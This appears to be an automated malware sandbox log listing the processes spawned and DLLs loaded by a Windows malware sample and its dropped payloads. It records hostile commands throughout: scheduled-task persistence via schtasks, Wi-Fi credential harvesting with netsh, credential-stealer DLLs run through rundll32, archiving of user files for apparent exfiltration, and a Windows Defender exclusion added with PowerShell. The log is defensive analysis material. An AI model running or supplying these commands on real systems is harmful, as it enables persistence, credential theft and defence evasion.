Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\1000021002\ac861238af.exe "C:\Users\user\1000021002\ac861238af.exe"
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\1000021002\ac861238af.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 928
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe "C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe "C:\Users\user\AppData\Local\Temp\1000071001\jok.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe "C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 --field-trial-handle=2296,i,9301016893778941798,11505312185340456869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe "C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe "C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe"
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Process created: C:\Users\user\AppData\Local\Temp\u6po.0.exe "C:\Users\user\AppData\Local\Temp\u6po.0.exe"
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe "C:\Users\user\AppData\Local\Temp\1000019001\amert.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe "C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\1000021002\ac861238af.exe "C:\Users\user\1000021002\ac861238af.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2656 --field-trial-handle=2296,i,9301016893778941798,11505312185340456869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 --field-trial-handle=2296,i,9301016893778941798,11505312185340456869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe "C:\Users\user\AppData\Local\Temp\1000071001\jok.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe "C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\1000021002\ac861238af.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 928
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe "C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe "C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Process created: C:\Users\user\AppData\Local\Temp\u6po.0.exe "C:\Users\user\AppData\Local\Temp\u6po.0.exe"
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wintypes.dll Jump to behavior
